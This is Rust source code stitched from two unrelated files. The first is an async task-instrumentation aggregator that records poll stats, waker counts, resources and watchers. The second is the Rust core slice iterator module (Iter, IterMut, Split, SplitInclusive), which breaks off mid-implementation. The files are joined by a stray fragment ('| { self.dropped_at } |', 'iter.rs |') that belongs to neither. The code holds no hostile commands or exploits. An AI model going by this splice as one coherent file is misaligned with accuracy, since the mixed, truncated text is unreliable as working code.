tracing::debug!(id = ?id, "new task details subscription");
if let Some(stats) = self.task_stats.get(&id) {
let (tx, rx) = mpsc::channel(buffer);
let subscription = Watch(tx);
let now = SystemTime::now();
// Send back the stream receiver.
// Then send the initial state --- if this fails, the subscription is already dead.
if stream_sender.send(rx).is_ok()
&& subscription.update(&proto::tasks::TaskDetails {
task_id: Some(id.into()),
now: Some(now.into()),
poll_times_histogram: serialize_histogram(&stats.poll_times_histogram).ok(),
})
{
self.details_watchers
.entry(id)
.or_insert_with(Vec::new)
.push(subscription);
}
}
// If the task is not found, drop `stream_sender` which will result in a not found error
}
/// Publish the current state to all active watchers.
///
/// This drops any watchers which have closed the RPC, or whose update
/// channel has filled up.
fn publish(&mut self) {
let new_metadata = if !self.new_metadata.is_empty() {
Some(proto::RegisterMetadata {
metadata: std::mem::take(&mut self.new_metadata),
})
} else {
None
};
let new_poll_ops = std::mem::take(&mut self.new_poll_ops);
let now = SystemTime::now();
let update = proto::instrument::Update {
now: Some(now.into()),
new_metadata,
task_update: Some(proto::tasks::TaskUpdate {
new_tasks: self
.tasks
.since_last_update()
.map(|(_, value)| value.to_proto())
.collect(),
stats_update: self.task_stats.as_proto(Include::UpdatedOnly),
}),
resource_update: Some(proto::resources::ResourceUpdate {
new_resources: self
.resources
.since_last_update()
.map(|(_, value)| value.to_proto())
.collect(),
stats_update: self.resource_stats.as_proto(Include::UpdatedOnly),
new_poll_ops,
}),
async_op_update: Some(proto::async_ops::AsyncOpUpdate {
new_async_ops: self
.async_ops
.since_last_update()
.map(|(_, value)| value.to_proto())
.collect(),
stats_update: self.async_op_stats.as_proto(Include::UpdatedOnly),
}),
};
self.watchers
.retain_and_shrink(|watch: &Watch<proto::instrument::Update>| watch.update(&update));
let stats = &self.task_stats;
// Assuming there are much fewer task details subscribers than there are
// stats updates, iterate over `details_watchers` and compact the map.
self.details_watchers.retain_and_shrink(|&id, watchers| {
if let Some(task_stats) = stats.get(&id) {
let details = proto::tasks::TaskDetails {
task_id: Some(id.into()),
now: Some(now.into()),
poll_times_histogram: serialize_histogram(&task_stats.poll_times_histogram)
.ok(),
};
watchers.retain(|watch| watch.update(&details));
!watchers.is_empty()
} else {
false
}
});
}
/// Update the current state with data from a single event.
fn update_state(&mut self, event: Event) {
// do state update
match event {
Event::Metadata(meta) => {
self.all_metadata.push(meta.into());
self.new_metadata.push(meta.into());
}
Event::Spawn {
id,
metadata,
at,
fields,
location,
} => {
let id = self.ids.id_for(id);
self.tasks.insert(
id,
Task {
id,
metadata,
fields,
location,
// TODO: parents
},
);
self.task_stats.insert(
id,
TaskStats {
created_at: Some(at),
..Default::default()
},
);
}
Event::Enter { id, at } => {
let id = self.ids.id_for(id);
if let Some(mut task_stats) = self.task_stats.update(&id) {
task_stats.poll_stats.update_on_span_enter(at);
}
if let Some(mut async_op_stats) = self.async_op_stats.update(&id) {
async_op_stats.poll_stats.update_on_span_enter(at);
}
}
Event::Exit { id, at } => {
let id = self.ids.id_for(id);
if let Some(mut task_stats) = self.task_stats.update(&id) {
task_stats.poll_stats.update_on_span_exit(at);
if let Some(since_last_poll) = task_stats.poll_stats.since_last_poll(at) {
task_stats
.poll_times_histogram
.record(since_last_poll.as_nanos().try_into().unwrap_or(u64::MAX))
.unwrap();
}
}
if let Some(mut async_op_stats) = self.async_op_stats.update(&id) {
async_op_stats.poll_stats.update_on_span_exit(at);
}
}
Event::Close { id, at } => {
let id = self.ids.id_for(id);
if let Some(mut task_stats) = self.task_stats.update(&id) {
task_stats.dropped_at = Some(at);
}
if let Some(mut resource_stats) = self.resource_stats.update(&id) {
resource_stats.dropped_at = Some(at);
}
if let Some(mut async_op_stats) = self.async_op_stats.update(&id) {
async_op_stats.dropped_at = Some(at);
}
}
Event::Waker { id, op, at } => {
let id = self.ids.id_for(id);
// It's possible for wakers to exist long after a task has
// finished. We don't want those cases to create a "new"
// task that isn't closed, just to insert some waker stats.
//
// It may be useful to eventually be able to report about
// "wasted" waker ops, but we'll leave that for another time.
if let Some(mut task_stats) = self.task_stats.update(&id) {
match op {
WakeOp::Wake { self_wake } | WakeOp::WakeByRef { self_wake } => {
task_stats.wakes += 1;
task_stats.last_wake = Some(at);
// If the task has woken itself, increment the
// self-wake count.
if self_wake {
task_stats.self_wakes += 1;
}
// Note: `Waker::wake` does *not* call the `drop`
// implementation, so waking by value doesn't
// trigger a drop event. so, count this as a `drop`
// to ensure the task's number of wakers can be
// calculated as `clones` - `drops`.
//
// see
// https://github.com/rust-lang/rust/blob/673d0db5e393e9c64897005b470bfeb6d5aec61b/library/core/src/task/wake.rs#L211-L212
if let WakeOp::Wake { .. } = op {
task_stats.waker_drops += 1;
}
}
WakeOp::Clone => {
task_stats.waker_clones += 1;
}
WakeOp::Drop => {
task_stats.waker_drops += 1;
}
}
}
}
Event::Resource {
at,
id,
metadata,
kind,
concrete_type,
location,
..
} => {
let id = self.ids.id_for(id);
self.resources.insert(
id,
Resource {
id,
kind,
metadata,
concrete_type,
location,
},
);
self.resource_stats.insert(
id,
ResourceStats {
created_at: Some(at),
..Default::default()
},
);
}
Event::PollOp {
metadata,
at,
resource_id,
op_name,
async_op_id,
task_id,
is_ready,
} => {
let async_op_id = self.ids.id_for(async_op_id);
let resource_id = self.ids.id_for(resource_id);
let task_id = self.ids.id_for(task_id);
let mut async_op_stats = self.async_op_stats.update_or_default(async_op_id);
async_op_stats.poll_stats.polls += 1;
async_op_stats.task_id.get_or_insert(task_id);
async_op_stats.resource_id.get_or_insert(resource_id);
if !is_ready && async_op_stats.poll_stats.first_poll.is_none() {
async_op_stats.poll_stats.first_poll = Some(at);
}
let poll_op = proto::resources::PollOp {
metadata: Some(metadata.into()),
resource_id: Some(resource_id.into()),
name: op_name,
task_id: Some(task_id.into()),
async_op_id: Some(async_op_id.into()),
is_ready,
};
self.all_poll_ops.push(poll_op.clone());
self.new_poll_ops.push(poll_op);
}
Event::StateUpdate {
resource_id,
update,
..
} => {
let resource_id = self.ids.id_for(resource_id);
if let Some(mut stats) = self.resource_stats.update(&resource_id) {
let field_name = match update.field.name.clone() {
Some(name) => name,
None => {
tracing::warn!(?update.field, "field missing name, skipping...");
return;
}
};
let upd_key = FieldKey {
resource_id,
field_name,
};
match stats.attributes.entry(upd_key) {
Entry::Occupied(ref mut attr) => {
update_attribute(attr.get_mut(), update);
}
Entry::Vacant(attr) => {
attr.insert(update.into());
}
}
}
}
Event::AsyncResourceOp {
at,
id,
source,
metadata,
..
} => {
let id = self.ids.id_for(id);
self.async_ops.insert(
id,
AsyncOp {
id,
metadata,
source,
},
);
self.async_op_stats.insert(
id,
AsyncOpStats {
created_at: Some(at),
..Default::default()
},
);
}
}
}
}
// ==== impl Flush ===
impl Flush {
pub(crate) fn trigger(&self) {
if self
.triggered
.compare_exchange(false, true, AcqRel, Acquire)
.is_ok()
{
self.should_flush.notify_one();
} else {
// someone else already did it, that's fine...
}
}
/// Indicates that the buffer has been successfully flushed.
fn has_flushed(&self) {
let _ = self
.triggered
.compare_exchange(true, false, AcqRel, Acquire);
}
}
impl<T: Clone> Watch<T> {
fn update(&self, update: &T) -> bool {
if let Ok(reserve) = self.0.try_reserve() {
reserve.send(Ok(update.clone()));
true
} else {
false
}
}
}
impl ToProto for PollStats {
type Output = proto::PollStats;
fn to_proto(&self) -> Self::Output {
proto::PollStats {
polls: self.polls,
first_poll: self.first_poll.map(Into::into),
last_poll_started: self.last_poll_started.map(Into::into),
last_poll_ended: self.last_poll_ended.map(Into::into),
busy_time: Some(self.busy_time.into()),
}
}
}
impl ToProto for Task {
type Output = proto::tasks::Task;
fn to_proto(&self) -> Self::Output {
proto::tasks::Task {
id: Some(self.id.into()),
// TODO: more kinds of tasks...
kind: proto::tasks::task::Kind::Spawn as i32,
metadata: Some(self.metadata.into()),
parents: Vec::new(), // TODO: implement parents nicely
fields: self.fields.clone(),
location: self.location.clone(),
}
}
}
impl ToProto for TaskStats {
type Output = proto::tasks::Stats;
fn to_proto(&self) -> Self::Output {
proto::tasks::Stats {
poll_stats: Some(self.poll_stats.to_proto()),
created_at: self.created_at.map(Into::into),
dropped_at: self.dropped_at.map(Into::into),
wakes: self.wakes,
waker_clones: self.waker_clones,
self_wakes: self.self_wakes,
waker_drops: self.waker_drops,
last_wake: self.last_wake.map(Into::into),
}
}
}
impl ToProto for Resource {
type Output = proto::resources::Resource;
fn to_proto(&self) -> Self::Output {
proto::resources::Resource {
id: Some(self.id.into()),
kind: Some(self.kind.clone()),
metadata: Some(self.metadata.into()),
concrete_type: self.concrete_type.clone(),
location: self.location.clone(),
}
}
}
impl ToProto for ResourceStats {
type Output = proto::resources::Stats;
fn to_proto(&self) -> Self::Output {
let attributes = self.attributes.values().cloned().collect();
proto::resources::Stats {
created_at: self.created_at.map(Into::into),
dropped_at: self.dropped_at.map(Into::into),
attributes,
}
}
}
impl ToProto for AsyncOp {
type Output = proto::async_ops::AsyncOp;
fn to_proto(&self) -> Self::Output {
proto::async_ops::AsyncOp {
id: Some(self.id.into()),
metadata: Some(self.metadata.into()),
source: self.source.clone(),
}
}
}
impl ToProto for AsyncOpStats {
type Output = proto::async_ops::Stats;
fn to_proto(&self) -> Self::Output {
proto::async_ops::Stats {
poll_stats: Some(self.poll_stats.to_proto()),
created_at: self.created_at.map(Into::into),
dropped_at: self.dropped_at.map(Into::into),
resource_id: self.resource_id.map(Into::into),
task_id: self.task_id.map(Into::into),
}
}
}
impl From<AttributeUpdate> for Attribute {
fn from(upd: AttributeUpdate) -> Self {
Attribute {
field: Some(upd.field),
unit: upd.unit,
}
}
}
// === impl Ids ===
impl Ids {
fn id_for(&mut self, span_id: span::Id) -> Id {
match self.id_mappings.entry(span_id) {
Entry::Occupied(entry) => *entry.get(),
Entry::Vacant(entry) => {
let task_id = self.next;
entry.insert(task_id);
self.next = self.next.wrapping_add(1);
task_id
}
}
}
#[inline]
fn remove_all(&mut self, ids: &HashSet<Id>) {
self.id_mappings.retain(|_, id| !ids.contains(id));
}
}
fn serialize_histogram(histogram: &Histogram<u64>) -> Result<Vec<u8>, V2SerializeError> {
let mut serializer = V2Serializer::new();
let mut buf = Vec::new();
serializer.serialize(histogram, &mut buf)?;
Ok(buf)
}
fn update_attribute(attribute: &mut Attribute, update: AttributeUpdate) {
use proto::field::Value::*;
let attribute_val = attribute.field.as_mut().and_then(|a| a.value.as_mut());
let update_val = update.field.value;
let update_name = update.field.name;
match (attribute_val, update_val) {
(Some(BoolVal(v)), Some(BoolVal(upd))) => *v = upd,
(Some(StrVal(v)), Some(StrVal(upd))) => *v = upd,
(Some(DebugVal(v)), Some(DebugVal(upd))) => *v = upd,
(Some(U64Val(v)), Some(U64Val(upd))) => match update.op {
Some(AttributeUpdateOp::Add) => *v += upd,
Some(AttributeUpdateOp::Sub) => *v -= upd,
Some(AttributeUpdateOp::Override) => *v = upd,
None => tracing::warn!(
"numeric attribute update {:?} needs to have an op field",
update_name
),
},
(Some(I64Val(v)), Some(I64Val(upd))) => match update.op {
Some(AttributeUpdateOp::Add) => *v += upd,
Some(AttributeUpdateOp::Sub) => *v -= upd,
Some(AttributeUpdateOp::Override) => *v = upd,
None => tracing::warn!(
"numeric attribute update {:?} needs to have an op field",
update_name
),
},
(val, update) => {
tracing::warn!(
"attribute {:?} cannot be updated by update {:?}",
val,
update
);
}
}
}
| {
self.dropped_at
} |
iter.rs | //! Definitions of a bunch of iterators for `[T]`.
#[macro_use] // import iterator! and forward_iterator!
mod macros;
use crate::cmp;
use crate::cmp::Ordering;
use crate::fmt;
use crate::intrinsics::{assume, exact_div, unchecked_sub};
use crate::iter::{FusedIterator, TrustedLen, TrustedRandomAccess};
use crate::marker::{PhantomData, Send, Sized, Sync};
use crate::mem;
use crate::ptr::NonNull;
use super::{from_raw_parts, from_raw_parts_mut};
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T> IntoIterator for &'a [T] {
type Item = &'a T;
type IntoIter = Iter<'a, T>;
fn into_iter(self) -> Iter<'a, T> {
self.iter()
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T> IntoIterator for &'a mut [T] {
type Item = &'a mut T;
type IntoIter = IterMut<'a, T>;
fn into_iter(self) -> IterMut<'a, T> {
self.iter_mut()
}
}
// Macro helper functions
#[inline(always)]
fn size_from_ptr<T>(_: *const T) -> usize {
mem::size_of::<T>()
}
/// Immutable slice iterator
///
/// This struct is created by the [`iter`] method on [slices].
///
/// # Examples
///
/// Basic usage:
///
/// ```
/// // First, we declare a type which has `iter` method to get the `Iter` struct (&[usize here]):
/// let slice = &[1, 2, 3];
///
/// // Then, we iterate over it:
/// for element in slice.iter() {
/// println!("{}", element);
/// }
/// ```
///
/// [`iter`]: ../../std/primitive.slice.html#method.iter
/// [slices]: ../../std/primitive.slice.html
#[stable(feature = "rust1", since = "1.0.0")]
pub struct Iter<'a, T: 'a> {
ptr: NonNull<T>,
end: *const T, // If T is a ZST, this is actually ptr+len. This encoding is picked so that
// ptr == end is a quick test for the Iterator being empty, that works
// for both ZST and non-ZST.
_marker: PhantomData<&'a T>,
}
#[stable(feature = "core_impl_debug", since = "1.9.0")]
impl<T: fmt::Debug> fmt::Debug for Iter<'_, T> {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_tuple("Iter").field(&self.as_slice()).finish()
}
}
#[stable(feature = "rust1", since = "1.0.0")]
unsafe impl<T: Sync> Sync for Iter<'_, T> {}
#[stable(feature = "rust1", since = "1.0.0")]
unsafe impl<T: Sync> Send for Iter<'_, T> {}
impl<'a, T> Iter<'a, T> {
#[inline]
pub(super) fn new(slice: &'a [T]) -> Self {
let ptr = slice.as_ptr();
// SAFETY: Similar to `IterMut::new`.
unsafe {
assume(!ptr.is_null());
let end = if mem::size_of::<T>() == 0 {
(ptr as *const u8).wrapping_add(slice.len()) as *const T
} else {
ptr.add(slice.len())
};
Self { ptr: NonNull::new_unchecked(ptr as *mut T), end, _marker: PhantomData }
}
}
/// Views the underlying data as a subslice of the original data.
///
/// This has the same lifetime as the original slice, and so the
/// iterator can continue to be used while this exists.
///
/// # Examples
///
/// Basic usage:
///
/// ```
/// // First, we declare a type which has the `iter` method to get the `Iter`
/// // struct (&[usize here]):
/// let slice = &[1, 2, 3];
///
/// // Then, we get the iterator:
/// let mut iter = slice.iter();
/// // So if we print what `as_slice` method returns here, we have "[1, 2, 3]":
/// println!("{:?}", iter.as_slice());
///
/// // Next, we move to the second element of the slice:
/// iter.next();
/// // Now `as_slice` returns "[2, 3]":
/// println!("{:?}", iter.as_slice());
/// ```
#[stable(feature = "iter_to_slice", since = "1.4.0")]
pub fn as_slice(&self) -> &'a [T] {
self.make_slice()
}
}
iterator! {struct Iter -> *const T, &'a T, const, {/* no mut */}, {
fn is_sorted_by<F>(self, mut compare: F) -> bool
where
Self: Sized,
F: FnMut(&Self::Item, &Self::Item) -> Option<Ordering>,
{
self.as_slice().windows(2).all(|w| {
compare(&&w[0], &&w[1]).map(|o| o != Ordering::Greater).unwrap_or(false)
})
}
}}
#[stable(feature = "rust1", since = "1.0.0")]
impl<T> Clone for Iter<'_, T> {
fn clone(&self) -> Self {
Iter { ptr: self.ptr, end: self.end, _marker: self._marker }
}
}
#[stable(feature = "slice_iter_as_ref", since = "1.13.0")]
impl<T> AsRef<[T]> for Iter<'_, T> {
fn as_ref(&self) -> &[T] {
self.as_slice()
}
}
/// Mutable slice iterator.
///
/// This struct is created by the [`iter_mut`] method on [slices].
///
/// # Examples
///
/// Basic usage:
///
/// ```
/// // First, we declare a type which has `iter_mut` method to get the `IterMut`
/// // struct (&[usize here]):
/// let mut slice = &mut [1, 2, 3];
///
/// // Then, we iterate over it and increment each element value:
/// for element in slice.iter_mut() {
/// *element += 1;
/// }
///
/// // We now have "[2, 3, 4]":
/// println!("{:?}", slice);
/// ```
///
/// [`iter_mut`]: ../../std/primitive.slice.html#method.iter_mut
/// [slices]: ../../std/primitive.slice.html
#[stable(feature = "rust1", since = "1.0.0")]
pub struct IterMut<'a, T: 'a> {
ptr: NonNull<T>,
end: *mut T, // If T is a ZST, this is actually ptr+len. This encoding is picked so that
// ptr == end is a quick test for the Iterator being empty, that works
// for both ZST and non-ZST.
_marker: PhantomData<&'a mut T>,
}
#[stable(feature = "core_impl_debug", since = "1.9.0")]
impl<T: fmt::Debug> fmt::Debug for IterMut<'_, T> {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_tuple("IterMut").field(&self.make_slice()).finish()
}
}
#[stable(feature = "rust1", since = "1.0.0")]
unsafe impl<T: Sync> Sync for IterMut<'_, T> {}
#[stable(feature = "rust1", since = "1.0.0")]
unsafe impl<T: Send> Send for IterMut<'_, T> {}
impl<'a, T> IterMut<'a, T> {
#[inline]
pub(super) fn new(slice: &'a mut [T]) -> Self {
let ptr = slice.as_mut_ptr();
// SAFETY: There are several things here:
//
// `ptr` has been obtained by `slice.as_ptr()` where `slice` is a valid
// reference thus it is non-NUL and safe to use and pass to
// `NonNull::new_unchecked` .
//
// Adding `slice.len()` to the starting pointer gives a pointer
// at the end of `slice`. `end` will never be dereferenced, only checked
// for direct pointer equality with `ptr` to check if the iterator is
// done.
//
// In the case of a ZST, the end pointer is just the start pointer plus
// the length, to also allows for the fast `ptr == end` check.
//
// See the `next_unchecked!` and `is_empty!` macros as well as the
// `post_inc_start` method for more informations.
unsafe {
assume(!ptr.is_null());
let end = if mem::size_of::<T>() == 0 {
(ptr as *mut u8).wrapping_add(slice.len()) as *mut T
} else {
ptr.add(slice.len())
};
Self { ptr: NonNull::new_unchecked(ptr), end, _marker: PhantomData }
}
}
/// Views the underlying data as a subslice of the original data.
///
/// To avoid creating `&mut` references that alias, this is forced
/// to consume the iterator.
///
/// # Examples
///
/// Basic usage:
///
/// ```
/// // First, we declare a type which has `iter_mut` method to get the `IterMut`
/// // struct (&[usize here]):
/// let mut slice = &mut [1, 2, 3];
///
/// {
/// // Then, we get the iterator:
/// let mut iter = slice.iter_mut();
/// // We move to next element:
/// iter.next();
/// // So if we print what `into_slice` method returns here, we have "[2, 3]":
/// println!("{:?}", iter.into_slice());
/// }
///
/// // Now let's modify a value of the slice:
/// {
/// // First we get back the iterator:
/// let mut iter = slice.iter_mut();
/// // We change the value of the first element of the slice returned by the `next` method:
/// *iter.next().unwrap() += 1;
/// }
/// // Now slice is "[2, 2, 3]":
/// println!("{:?}", slice);
/// ```
#[stable(feature = "iter_to_slice", since = "1.4.0")]
pub fn into_slice(self) -> &'a mut [T] {
// SAFETY: the iterator was created from a mutable slice with pointer
// `self.ptr` and length `len!(self)`. This guarantees that all the prerequisites
// for `from_raw_parts_mut` are fulfilled.
unsafe { from_raw_parts_mut(self.ptr.as_ptr(), len!(self)) }
}
/// Views the underlying data as a subslice of the original data.
///
/// To avoid creating `&mut [T]` references that alias, the returned slice
/// borrows its lifetime from the iterator the method is applied on.
///
/// # Examples
///
/// Basic usage:
///
/// ```
/// # #![feature(slice_iter_mut_as_slice)]
/// let mut slice: &mut [usize] = &mut [1, 2, 3];
///
/// // First, we get the iterator:
/// let mut iter = slice.iter_mut();
/// // So if we check what the `as_slice` method returns here, we have "[1, 2, 3]":
/// assert_eq!(iter.as_slice(), &[1, 2, 3]);
///
/// // Next, we move to the second element of the slice:
/// iter.next();
/// // Now `as_slice` returns "[2, 3]":
/// assert_eq!(iter.as_slice(), &[2, 3]);
/// ```
#[unstable(feature = "slice_iter_mut_as_slice", reason = "recently added", issue = "58957")]
pub fn as_slice(&self) -> &[T] {
self.make_slice()
}
}
iterator! {struct IterMut -> *mut T, &'a mut T, mut, {mut}, {}}
/// An internal abstraction over the splitting iterators, so that
/// splitn, splitn_mut etc can be implemented once.
#[doc(hidden)]
pub(super) trait SplitIter: DoubleEndedIterator {
/// Marks the underlying iterator as complete, extracting the remaining
/// portion of the slice.
fn finish(&mut self) -> Option<Self::Item>;
}
/// An iterator over subslices separated by elements that match a predicate
/// function.
///
/// This struct is created by the [`split`] method on [slices].
///
/// # Example
///
/// ```
/// let slice = [10, 40, 33, 20];
/// let mut iter = slice.split(|num| num % 3 == 0);
/// ```
///
/// [`split`]: ../../std/primitive.slice.html#method.split
/// [slices]: ../../std/primitive.slice.html
#[stable(feature = "rust1", since = "1.0.0")]
pub struct Split<'a, T: 'a, P>
where
P: FnMut(&T) -> bool,
{
v: &'a [T],
pred: P,
finished: bool,
}
impl<'a, T: 'a, P: FnMut(&T) -> bool> Split<'a, T, P> {
#[inline]
pub(super) fn new(slice: &'a [T], pred: P) -> Self {
Self { v: slice, pred, finished: false }
}
}
#[stable(feature = "core_impl_debug", since = "1.9.0")]
impl<T: fmt::Debug, P> fmt::Debug for Split<'_, T, P>
where
P: FnMut(&T) -> bool,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("Split").field("v", &self.v).field("finished", &self.finished).finish()
}
}
// FIXME(#26925) Remove in favor of `#[derive(Clone)]`
#[stable(feature = "rust1", since = "1.0.0")]
impl<T, P> Clone for Split<'_, T, P>
where
P: Clone + FnMut(&T) -> bool,
{
fn clone(&self) -> Self {
Split { v: self.v, pred: self.pred.clone(), finished: self.finished }
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T, P> Iterator for Split<'a, T, P>
where
P: FnMut(&T) -> bool,
{
type Item = &'a [T];
#[inline]
fn next(&mut self) -> Option<&'a [T]> {
if self.finished {
return None;
}
match self.v.iter().position(|x| (self.pred)(x)) {
None => self.finish(),
Some(idx) => {
let ret = Some(&self.v[..idx]);
self.v = &self.v[idx + 1..];
ret
}
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
if self.finished { (0, Some(0)) } else { (1, Some(self.v.len() + 1)) }
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T, P> DoubleEndedIterator for Split<'a, T, P>
where
P: FnMut(&T) -> bool,
{
#[inline]
fn next_back(&mut self) -> Option<&'a [T]> {
if self.finished {
return None;
}
match self.v.iter().rposition(|x| (self.pred)(x)) {
None => self.finish(),
Some(idx) => {
let ret = Some(&self.v[idx + 1..]);
self.v = &self.v[..idx];
ret
}
}
}
}
impl<'a, T, P> SplitIter for Split<'a, T, P>
where
P: FnMut(&T) -> bool,
{
#[inline]
fn finish(&mut self) -> Option<&'a [T]> {
if self.finished {
None
} else {
self.finished = true;
Some(self.v)
}
}
}
#[stable(feature = "fused", since = "1.26.0")]
impl<T, P> FusedIterator for Split<'_, T, P> where P: FnMut(&T) -> bool {}
/// An iterator over subslices separated by elements that match a predicate
/// function. Unlike `Split`, it contains the matched part as a terminator
/// of the subslice.
///
/// This struct is created by the [`split_inclusive`] method on [slices].
///
/// # Example
///
/// ```
/// #![feature(split_inclusive)]
///
/// let slice = [10, 40, 33, 20];
/// let mut iter = slice.split_inclusive(|num| num % 3 == 0);
/// ```
///
/// [`split_inclusive`]: ../../std/primitive.slice.html#method.split_inclusive
/// [slices]: ../../std/primitive.slice.html
#[unstable(feature = "split_inclusive", issue = "72360")]
pub struct SplitInclusive<'a, T: 'a, P>
where
P: FnMut(&T) -> bool,
{
v: &'a [T],
pred: P,
finished: bool,
}
impl<'a, T: 'a, P: FnMut(&T) -> bool> SplitInclusive<'a, T, P> {
#[inline]
pub(super) fn new(slice: &'a [T], pred: P) -> Self {
Self { v: slice, pred, finished: false }
}
}
#[unstable(feature = "split_inclusive", issue = "72360")]
impl<T: fmt::Debug, P> fmt::Debug for SplitInclusive<'_, T, P>
where
P: FnMut(&T) -> bool,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("SplitInclusive")
.field("v", &self.v)
.field("finished", &self.finished)
.finish()
}
}
// FIXME(#26925) Remove in favor of `#[derive(Clone)]`
#[unstable(feature = "split_inclusive", issue = "72360")]
impl<T, P> Clone for SplitInclusive<'_, T, P>
where
P: Clone + FnMut(&T) -> bool,
{
fn clone(&self) -> Self {
SplitInclusive { v: self.v, pred: self.pred.clone(), finished: self.finished }
}
}
#[unstable(feature = "split_inclusive", issue = "72360")]
impl<'a, T, P> Iterator for SplitInclusive<'a, T, P>
where
P: FnMut(&T) -> bool,
{
type Item = &'a [T];
#[inline]
fn next(&mut self) -> Option<&'a [T]> {
if self.finished {
return None;
}
let idx =
self.v.iter().position(|x| (self.pred)(x)).map(|idx| idx + 1).unwrap_or(self.v.len());
if idx == self.v.len() {
self.finished = true;
}
let ret = Some(&self.v[..idx]);
self.v = &self.v[idx..];
ret
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
if self.finished { (0, Some(0)) } else { (1, Some(self.v.len() + 1)) }
}
}
#[unstable(feature = "split_inclusive", issue = "72360")]
impl<'a, T, P> DoubleEndedIterator for SplitInclusive<'a, T, P>
where
P: FnMut(&T) -> bool,
{
#[inline]
fn next_back(&mut self) -> Option<&'a [T]> {
if self.finished {
return None;
}
// The last index of self.v is already checked and found to match
// by the last iteration, so we start searching a new match
// one index to the left.
let remainder = if self.v.is_empty() { &[] } else { &self.v[..(self.v.len() - 1)] };
let idx = remainder.iter().rposition(|x| (self.pred)(x)).map(|idx| idx + 1).unwrap_or(0);
if idx == 0 {
self.finished = true;
}
let ret = Some(&self.v[idx..]);
self.v = &self.v[..idx];
ret
}
}
#[unstable(feature = "split_inclusive", issue = "72360")]
impl<T, P> FusedIterator for SplitInclusive<'_, T, P> where P: FnMut(&T) -> bool {}
/// An iterator over the mutable subslices of the vector which are separated
/// by elements that match `pred`.
///
/// This struct is created by the [`split_mut`] method on [slices].
///
/// # Example
///
/// ```
/// let mut v = [10, 40, 30, 20, 60, 50];
/// let iter = v.split_mut(|num| *num % 3 == 0);
/// ```
///
/// [`split_mut`]: ../../std/primitive.slice.html#method.split_mut
/// [slices]: ../../std/primitive.slice.html
#[stable(feature = "rust1", since = "1.0.0")]
pub struct SplitMut<'a, T: 'a, P>
where
P: FnMut(&T) -> bool,
{
v: &'a mut [T],
pred: P,
finished: bool,
}
impl<'a, T: 'a, P: FnMut(&T) -> bool> SplitMut<'a, T, P> {
#[inline]
pub(super) fn new(slice: &'a mut [T], pred: P) -> Self {
Self { v: slice, pred, finished: false }
}
}
#[stable(feature = "core_impl_debug", since = "1.9.0")]
impl<T: fmt::Debug, P> fmt::Debug for SplitMut<'_, T, P>
where
P: FnMut(&T) -> bool,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("SplitMut").field("v", &self.v).field("finished", &self.finished).finish()
}
}
impl<'a, T, P> SplitIter for SplitMut<'a, T, P>
where
P: FnMut(&T) -> bool,
{
#[inline]
fn finish(&mut self) -> Option<&'a mut [T]> {
if self.finished {
None
} else {
self.finished = true;
Some(mem::replace(&mut self.v, &mut []))
}
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T, P> Iterator for SplitMut<'a, T, P>
where
P: FnMut(&T) -> bool,
{
type Item = &'a mut [T];
#[inline]
fn next(&mut self) -> Option<&'a mut [T]> {
if self.finished {
return None;
}
let idx_opt = {
// work around borrowck limitations
let pred = &mut self.pred;
self.v.iter().position(|x| (*pred)(x))
};
match idx_opt {
None => self.finish(),
Some(idx) => {
let tmp = mem::replace(&mut self.v, &mut []);
let (head, tail) = tmp.split_at_mut(idx);
self.v = &mut tail[1..];
Some(head)
}
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
if self.finished {
(0, Some(0))
} else {
// if the predicate doesn't match anything, we yield one slice
// if it matches every element, we yield len+1 empty slices.
(1, Some(self.v.len() + 1))
}
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T, P> DoubleEndedIterator for SplitMut<'a, T, P>
where
P: FnMut(&T) -> bool,
{
#[inline]
fn next_back(&mut self) -> Option<&'a mut [T]> {
if self.finished {
return None;
}
let idx_opt = {
// work around borrowck limitations
let pred = &mut self.pred;
self.v.iter().rposition(|x| (*pred)(x))
};
match idx_opt {
None => self.finish(),
Some(idx) => {
let tmp = mem::replace(&mut self.v, &mut []);
let (head, tail) = tmp.split_at_mut(idx);
self.v = head;
Some(&mut tail[1..])
}
}
}
}
#[stable(feature = "fused", since = "1.26.0")]
impl<T, P> FusedIterator for SplitMut<'_, T, P> where P: FnMut(&T) -> bool {}
/// An iterator over the mutable subslices of the vector which are separated
/// by elements that match `pred`. Unlike `SplitMut`, it contains the matched
/// parts in the ends of the subslices.
///
/// This struct is created by the [`split_inclusive_mut`] method on [slices].
///
/// # Example
///
/// ```
/// #![feature(split_inclusive)]
///
/// let mut v = [10, 40, 30, 20, 60, 50];
/// let iter = v.split_inclusive_mut(|num| *num % 3 == 0);
/// ```
///
/// [`split_inclusive_mut`]: ../../std/primitive.slice.html#method.split_inclusive_mut
/// [slices]: ../../std/primitive.slice.html
#[unstable(feature = "split_inclusive", issue = "72360")]
pub struct SplitInclusiveMut<'a, T: 'a, P>
where
P: FnMut(&T) -> bool,
{
v: &'a mut [T],
pred: P,
finished: bool,
}
impl<'a, T: 'a, P: FnMut(&T) -> bool> SplitInclusiveMut<'a, T, P> {
#[inline]
pub(super) fn new(slice: &'a mut [T], pred: P) -> Self {
Self { v: slice, pred, finished: false }
}
}
#[unstable(feature = "split_inclusive", issue = "72360")]
impl<T: fmt::Debug, P> fmt::Debug for SplitInclusiveMut<'_, T, P>
where
P: FnMut(&T) -> bool,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("SplitInclusiveMut")
.field("v", &self.v)
.field("finished", &self.finished)
.finish()
}
}
#[unstable(feature = "split_inclusive", issue = "72360")]
impl<'a, T, P> Iterator for SplitInclusiveMut<'a, T, P>
where
P: FnMut(&T) -> bool,
{
type Item = &'a mut [T];
#[inline]
